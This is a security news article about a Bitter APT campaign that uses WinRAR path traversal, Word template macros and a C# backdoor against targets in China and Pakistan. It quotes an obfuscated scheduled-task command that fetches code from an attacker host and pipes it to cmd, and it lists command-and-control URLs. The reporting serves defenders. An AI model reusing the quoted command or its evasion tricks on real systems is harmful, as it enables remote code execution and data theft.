Bitter APT Hackers Exploit WinRAR Zero-Day Via Weaponized Word Documents to Steal Sensitive Data

The Bitter APT group, also tracked as APT-Q-37 and known in China as 蔓灵花, has launched a sophisticated cyberespionage campaign targeting government agencies, military installations, and critical infrastructure across China and Pakistan.

The threat actor has deployed weaponized Microsoft Office documents that exploit a previously unknown zero-day vulnerability in WinRAR archive software to install custom C# backdoors on victim systems.

This multi-pronged attack demonstrates a significant evolution in the group’s technical capabilities and persistence mechanisms.

The campaign leverages two distinct infection vectors to deliver malicious payloads. The first method employs VBA macro-laden Excel files disguised as legitimate conference documentation, while the second exploits a WinRAR path traversal vulnerability predating CVE-2023-38088.

Both approaches ultimately deploy the same C# backdoor designed to exfiltrate sensitive data and execute arbitrary commands from remote servers.

The attackers carefully crafted their social engineering lures to target specific personnel within government and defense sectors, indicating prior reconnaissance and victim profiling.

Qianxin analysts identified the malicious activity in October 2024 after detecting anomalous network traffic patterns originating from compromised systems.

The researchers traced the infrastructure back to command-and-control servers hosted on the esanojinjasvc.com domain, which was registered in April 2024 specifically for this operation.

Analysis revealed that the backdoor communicates with multiple subdomains including msoffice.365cloudz.esanojinjasvc.com, employing sophisticated encryption techniques to evade network-based detection systems.

The attack chain begins when victims receive phishing emails containing malicious RAR archives with names like “Provision of Information for Sectoral for AJK.rar.”

Upon extraction with vulnerable WinRAR versions (7.11 or earlier), the archive exploits a path traversal flaw to overwrite the user’s Normal.dotm template file.

When Microsoft Word subsequently launches, it automatically loads the compromised template, triggering embedded macros that download and execute the winnsc.exe backdoor from the remote server koliwooclients.com using SMB network shares.

Persistence Mechanisms and Backdoor Functionality

The malware establishes persistence through multiple redundant mechanisms to ensure continued access.

The macro code implements a function called periperi() that creates a batch file named kefe.bat in the Windows Startup directory.

This script establishes a scheduled task titled “OneDriveUpdates1100988844” that executes every 26 minutes, making POST requests to hxxps://www.keeferbeautytrends.com/d6Z2.php.

The scheduled task command utilizes string obfuscation techniques to evade signature-based detection:-

s^ch^t^a^s^k^s /create /tn "OneDriveUpdates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"

The C# backdoor employs AES encryption for string obfuscation through a dedicated decryption function named gjfdkgitjkg().

This function decrypts critical configuration data including C2 URLs, file paths, and POST parameters.

The backdoor continuously collects system information including the temporary directory path, operating system architecture, and hostname, transmitting this data to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.

Based on C2 server responses, the malware downloads additional executables, repairs their PE headers by adding the DOS signature {0x4D 0x5A}, validates the file structure, and executes them while reporting success or failure codes back to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.